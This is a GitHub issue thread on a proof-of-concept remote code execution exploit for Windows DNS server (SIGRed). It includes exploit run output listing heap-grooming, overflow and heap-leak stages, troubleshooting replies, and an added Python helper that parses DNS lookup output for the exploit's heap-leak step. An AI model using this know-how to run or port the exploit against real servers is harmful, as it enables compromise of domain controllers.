chompie1337 / SIGRed_RCE_PoC


Getting a crash #8

Closed russokiwi closed 3 years ago

russokiwi commented 3 years ago

Hi,

I'm getting the following when attempting to exploit. Any ideas?

```
─# python3 exploit.py -ip 10.0.2.100 -d vbsigred.com
[!] grooming small buffer size freelist
Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163
[!] doing DNS record heap spray
[!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123
[!] triggering realloc and overflow
[!] triggering free for fake timeout object
[!] triggering timeout object allocations
[!] triggering frees for heap ptr leak
[!] triggering heap ptr leak
Traceback (most recent call last):
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 259, in <module>
    main()
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 255, in main
    do_rce(args.ip, args.domain)
  File "/root/tools/SIGRed_RCE_PoC/exploit.py", line 117, in do_rce
    hl64_bytes = sigs[11].encode('ascii')
IndexError: list index out of range
```

chompie1337 commented 3 years ago

What is the contents of heapleakb64?

russokiwi commented 3 years ago

;; connection timed out; no servers could be reached
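The `IndexError` in the traceback above is a symptom, not the bug: the exploit splits the text returned by a DNS lookup for the heap-leak record and indexes into the resulting fields, and when the lookup fails there are no fields at all, because dig prints only `;; connection timed out; no servers could be reached`. The helper below is an added example, not code from the SIGRed_RCE_PoC repository, and it assumes dig-style output (the PoC's actual lookup command and field indexing are not shown in this thread). It classifies the output so a timed-out lookup is reported as such, and otherwise extracts the base64 signature field of a SIG answer using the SIG RDATA layout from RFC 2535 (type covered, algorithm, labels, original TTL, expiration, inception, key tag, signer's name, signature). The sample outputs are constructed; the signature value is a dummy string, not leaked heap data.

```python
"""Added example (not part of SIGRed_RCE_PoC): classify dig output for the
heap-leak lookup so a timeout is reported instead of surfacing as IndexError.
Assumes dig-style text output; sample inputs below are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: what dig prints when the DNS service does not answer,
# e.g. because it is restarting after a crash.
TIMEOUT_OUTPUT = ";; connection timed out; no servers could be reached\n"

# Constructed sample: an answer section for a SIG record.  RDATA values are
# placeholders; the base64 field is a dummy string, not real leaked data.
ANSWER_OUTPUT = (
    ";; ANSWER SECTION:\n"
    "heapleak.vbsigred.com.\t3600\tIN\tSIG\tA 5 3 3600 20210101000000 "
    "20201201000000 12345 vbsigred.com. QUJDREVGR0g=\n"
)

# Position of the signature within SIG RDATA (RFC 2535 presentation format):
# type-covered(0) algorithm(1) labels(2) orig-TTL(3) expiration(4)
# inception(5) key-tag(6) signer(7) signature(8)
SIG_SIGNATURE_FIELD = 8


@dataclass
class LookupResult:
    status: str                       # 'timeout', 'noanswer' or 'answer'
    rdata: Optional[List[str]] = None  # whitespace-split RDATA when 'answer'


def classify_dig_output(text: str, rrtype: str = "SIG") -> LookupResult:
    """Return the RDATA of the first `rrtype` answer line, or why there is none."""
    if re.search(r";; connection timed out", text):
        return LookupResult("timeout")
    for line in text.splitlines():
        # dig comment lines start with ';'; skip those and blank lines.
        if not line.strip() or line.lstrip().startswith(";"):
            continue
        fields = line.split()
        # Answer line layout: <owner> <ttl> <class> <type> <rdata...>
        if len(fields) >= 5 and fields[3] == rrtype:
            return LookupResult("answer", fields[4:])
    return LookupResult("noanswer")


def signature_b64(text: str) -> str:
    """Extract the base64 signature from a SIG answer.

    Raises RuntimeError with the failure reason when the lookup produced no
    answer, which is what a bare list index would report as IndexError."""
    res = classify_dig_output(text)
    if res.status != "answer":
        raise RuntimeError(
            f"heap leak lookup failed ({res.status}); check with a packet "
            "capture that the DNS service is still answering before retrying"
        )
    if len(res.rdata) <= SIG_SIGNATURE_FIELD:
        raise RuntimeError(f"malformed SIG RDATA: {res.rdata}")
    return res.rdata[SIG_SIGNATURE_FIELD]


if __name__ == "__main__":
    print(signature_b64(ANSWER_OUTPUT))
    try:
        signature_b64(TIMEOUT_OUTPUT)
    except RuntimeError as e:
        print(e)
```

Run against the two constructed samples, the answer case yields the base64 field and the timeout case produces a message naming the failure, which is the check one would want before the exploit proceeds to the heap-pointer leak stage.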

chompie1337 commented 3 years ago

How long does it take to run? I would recommend looking at a network capture to make sure traffic is flowing correctly.

russokiwi commented 3 years ago

About 15 minutes, though it seems a bit slow, all on a gigabit LAN. Traffic seems to be flowing; I can see in the Windows DNS logs that the DNS service is rebooting itself. The DC is 2008 R2, BTW.

chompie1337 commented 3 years ago

2008 R2 is not supported with this exploit. It's possible to rework it for that version. See the accompanying blog post; the exercise is left up to the reader 😌